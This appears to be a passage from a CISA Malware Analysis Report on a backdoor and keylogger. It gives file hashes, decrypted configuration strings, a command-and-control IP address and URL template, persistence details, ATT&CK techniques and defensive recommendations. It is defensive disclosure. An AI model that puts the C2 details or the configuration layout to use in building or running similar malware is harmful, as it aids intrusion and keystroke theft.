ssdeep 3:pSMk0eR2Hxm+yn:pSMFeR2Vy
Entropy 4.546046
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
f1a2791eeb... Created_By 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
Description

This artifact contains a GUID that is generated by the malware to uniquely identify the system during communication with the C2.

f2ba8b8aabf73020febd3a925276d52ce88f295537fe57723df714c13f5a8780

Tags

backdoor, keylogger

Details
Name thumb.dat
Size 58274 bytes
Type data
MD5 84f09d192ec90542ede22c370836ffa6
SHA1 7fb23c6b4db90b55694bdd1cc5c1b4c706a4e181
SHA256 f2ba8b8aabf73020febd3a925276d52ce88f295537fe57723df714c13f5a8780
SHA512 56474f45eed25ab86ac9d17b6afb69e0dee07fe507fc5ac4e22ebae0d124700c533dc2adaaaf4be096a5dab27f7f88c21b290cca600576dbf8f10482f2f62d8b
ssdeep 1536:xy98XehX2k0xfXGxGKt5mzvOOIE3CYzahbdoZJI7Vq:xRX0X90KNtevUXYzahbdfq
Entropy 7.301514
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
f2ba8b8aab... Created_By 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
Description

This artifact is the encrypted configuration data that is read by 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7 detailed in this report. The decrypted strings in the configuration are listed below:

---Begin Decrypted Strings---
system -k networkservice
svchost.exe
localservice -k localservice
networkservice
clip.log
rb %04/%02d%02d:%02d:%02d
ab+
SOFTWARE\Microsoft
config_ : %d %d %d %d
config.ini
Guid
Config %08X%04X%04X%02X%02X%02X%02X%02X%02X%02X%02X
RtlGetVersion
ntdll.dll
Vista
Win2008
Win7
Win2008(R2)
Win8
Win2012
Win8.1
Win2012(R2)
WinXp
Win2003
Win10
Win2016
IsWow64Process
kernel32
open
%d/%d/%d %d:%d
key.log
explorer.exe
/api/v2/ajax
POST
https://%s:%d/api/v2/ajax
pipetestpipe
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
config.ini
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
log.log
%s%d
exe
wb
Kernel32.dll
msiexec.exe
cmd.exe
ntdll
SeDebugPrivilege
runas
taskmgr
exe
ccc
bbb
aaa
windefende%d
80A85553-1E05-4323-B4F9-43A4396A4507
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36

---End Decrypted Strings---

This configuration allows the malware to connect to its C2, create persistence on the system, log keystrokes and telemetry data, and execute commands from the command line.

Relationship Summary

df847abbfa... Used 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
52072a8f99... Connected_To 104.168.236.46
52072a8f99... Used_By df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348
52072a8f99... Created f1a2791eebaea183f399110c9e8ae11c67f5bebf93a5573d1ac3c56fc71b2230
52072a8f99... Created f2ba8b8aabf73020febd3a925276d52ce88f295537fe57723df714c13f5a8780
104.168.236.46 Connected_From 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
f1a2791eeb... Created_By 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7
f2ba8b8aab... Created_By 52072a8f99dacd5c293fccd051eab95516d8b880cd2bc5a7e0f4a30d008e22a7

Conclusion

The following MITRE ATT&CK tactics and techniques were observed during analysis of these samples.

T1543.003 Persistence: Create or Modify System Process. Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions. Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg.

T1574.002 Hijack Execution Flow: DLL Side-Loading. Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

T1567.000 Exfiltration: Exfiltration Over Web Service. Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.

T1560.000 Collection: Archive Collected Data. An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

Revisions

Initial Publication: September 29, 2022